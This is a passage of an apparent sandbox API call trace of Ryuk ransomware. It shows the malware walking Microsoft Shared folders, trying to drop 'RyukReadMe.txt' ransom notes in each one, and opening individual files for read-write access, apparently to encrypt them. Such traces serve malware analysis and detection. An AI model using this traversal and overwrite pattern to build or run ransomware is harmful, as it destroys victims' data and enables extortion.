lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.695] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.695] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.695] SetLastError (dwErrCode=0x0) [0131.695] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.696] GetLastError () returned 0x5 [0131.696] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.696] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.696] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.696] SetLastError (dwErrCode=0x0) [0131.696] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.696] GetLastError () returned 0x5 [0131.696] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.696] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.696] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.697] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.697] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.697] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.697] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.697] SetLastError (dwErrCode=0x0) [0131.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.697] GetLastError () returned 0x5 [0131.697] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.697] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.697] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.697] SetLastError (dwErrCode=0x0) [0131.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.697] GetLastError () returned 0x5 [0131.697] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.697] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.697] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.698] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.698] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.698] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.698] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.698] SetLastError (dwErrCode=0x0) [0131.698] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.698] GetLastError () returned 0x5 [0131.698] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.698] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.698] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.698] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.698] SetLastError (dwErrCode=0x0) [0131.698] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.698] GetLastError () returned 0x5 [0131.698] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.698] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.698] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.698] SetLastError (dwErrCode=0x0) [0131.698] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.699] GetLastError () returned 0x5 [0131.699] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.699] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.699] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.699] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.699] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.699] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.699] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.700] SetLastError (dwErrCode=0x0) [0131.700] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.700] GetLastError () returned 0x5 [0131.700] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.700] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.700] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.700] SetLastError (dwErrCode=0x0) [0131.700] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.700] GetLastError () returned 0x5 [0131.700] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.700] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.700] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.700] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.700] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.700] SetLastError (dwErrCode=0x0) [0131.700] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.701] GetLastError () returned 0x5 [0131.701] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.701] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.701] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.701] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.701] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.701] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.701] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.701] SetLastError (dwErrCode=0x0) [0131.701] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.701] GetLastError () returned 0x5 [0131.701] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.701] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.701] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.701] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.701] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.701] SetLastError (dwErrCode=0x0) [0131.701] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.702] GetLastError () returned 0x5 [0131.702] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.702] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.702] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.702] SetLastError (dwErrCode=0x0) [0131.702] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.702] GetLastError () returned 0x5 [0131.702] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.702] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.702] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.702] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.702] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.702] SetLastError (dwErrCode=0x0) [0131.702] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.702] GetLastError () returned 0x5 [0131.702] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.702] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.702] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.703] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.703] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.703] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.703] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.703] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.703] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.703] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.703] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM", dwFileAttributes=0x80) returned 0 [0131.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.704] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.704] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.704] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.704] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.704] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.704] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.704] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.704] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.704] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.704] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM", dwFileAttributes=0x80) returned 0 [0131.705] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.705] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.705] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.705] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.705] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.705] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.706] SetLastError (dwErrCode=0x0) [0131.706] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.709] GetLastError () returned 0x5 [0131.709] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.709] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.709] SetLastError (dwErrCode=0x0) [0131.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.710] GetLastError () returned 0x5 [0131.710] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.710] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.710] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.710] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.710] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.710] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.710] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", dwFileAttributes=0x80) returned 0 [0131.710] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.710] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.711] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.711] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.711] SetLastError (dwErrCode=0x0) [0131.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.711] GetLastError () returned 0x5 [0131.711] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.711] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 